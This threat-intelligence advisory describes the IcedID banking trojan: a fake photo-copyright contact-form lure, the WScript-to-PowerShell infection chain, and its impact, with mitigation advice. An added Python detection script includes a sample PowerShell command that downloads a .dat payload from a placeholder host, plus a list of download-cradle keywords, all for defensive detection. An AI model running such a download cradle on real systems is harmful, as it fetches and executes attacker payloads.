IcedID Banking Trojan Malware Threat Intel Advisory

###### Advisory Type Malware Intelligence
###### Malware Name IcedID
###### Malware Aliases BokBot
###### Malware Type Banking Trojan
###### Target OS Windows

Executive Summary

First noticed in 2017, IcedID is a banking trojan that steals financial information. IcedID has also been leveraged as a dropper for other malware and in the infection stage of ransomware operations.

IcedID is delivered through multiple methods, of which phishing emails with macro-embedded attachments are the most prevalent. In a recent IcedID campaign, attackers abused the website contact forms of multiple enterprises to send messages laced with malicious links; clicking a link downloaded a malicious .zip file. These messages typically create a sense of urgency to provoke immediate action.

For instance, the sender poses as a photographer threatening legal action against the company for using their photos on its site without permission. The sender then shares a malicious link that purports to be evidence of the infringement. When the recipient clicks the link, however, they are taken to a Google page that downloads the malicious .zip file.

Technical Analysis

The phishing emails used in IcedID campaigns contain a malicious link that, when clicked, loads a Google page. This page requires the unsuspecting victim to sign in with their Google credentials, after which a malicious zip file is automatically downloaded to the victim's machine. If the first link fails, the victim is redirected to a .top domain, which in turn leads to a Google User Content page that downloads the malicious zip file.

Stages of execution:

  • The zip file contains a malicious JavaScript file that is executed via WScript
  • Executing the JS file creates a Shell object
  • The Shell object launches PowerShell to download the IcedID payload as a .dat file
  • The IcedID payload is encrypted to evade detection
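As an added example that is not part of the advisory, the following Python script scores constructed process-creation events (Sysmon-style parent/image/command-line fields are an assumption) against the execution chain above: a script host running a .js file, the script host spawning PowerShell, and PowerShell fetching a .dat payload.

```python
import re

# Constructed sample events for this example; every path, file name and
# URL is made up and not taken from the advisory or any real incident.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\Downloads\evidence\photo_proof.js"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x.dat','C:\Users\victim\AppData\Local\Temp\x.dat')"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Users\victim\Documents"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Scripts\logon.vbs"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# Command-line fragments typical of PowerShell download activity.
DOWNLOAD_TOKENS = ("downloadfile", "downloadstring", "net.webclient",
                   "invoke-webrequest", "iwr ", "start-bitstransfer")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the chain stages an event matches (empty list if none)."""
    parent, image = basename(ev["parent"]), basename(ev["image"])
    cmd = ev["cmdline"].lower()
    reasons = []
    if image in SCRIPT_HOSTS and re.search(r"\.jse?\b", cmd):
        reasons.append("script_host_running_js")          # stage 1
    if parent in SCRIPT_HOSTS and image in POWERSHELL:
        reasons.append("script_host_spawned_powershell")   # stage 2
    if image in POWERSHELL and any(t in cmd for t in DOWNLOAD_TOKENS):
        reasons.append("powershell_download_cradle")       # stage 3
    if image in POWERSHELL and ".dat" in cmd:
        reasons.append("dat_payload_fetch")                # stage 3 payload
    return reasons


def severity(reasons):
    """High only when PowerShell spawned by a script host also downloads."""
    if {"script_host_spawned_powershell", "powershell_download_cradle"} <= set(reasons):
        return "high"
    return "medium" if reasons else "none"


def analyze(events):
    """List (index, reasons, severity) for every event that matched a stage."""
    hits = [(i, score_event(ev)) for i, ev in enumerate(events)]
    return [(i, r, severity(r)) for i, r in hits if r]
```

Run on the constructed events, the script flags the first two (the .js launch as medium, the PowerShell download as high) and leaves the benign PowerShell and logon-script events alone.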


Technical Impact
  • IcedID is a banking trojan that steals the victim’s banking credentials and other financial information from the infected system and sends the gathered data to the attacker’s C2.
  • IcedID also acts as a loader for other payloads such as ransomware, enabling further attacks.

Business Impact
  • The banking trojan compromises the privacy of its victims and misuses their financial information.
  • A follow-on ransomware infection has an adverse impact on the business and its reputation.

Recommendations

  • Raise awareness about phishing emails and malicious links.
  • Use multi-factor authentication for all accounts.
  • Keep systems patched and up to date.
  • Use up-to-date antivirus software.
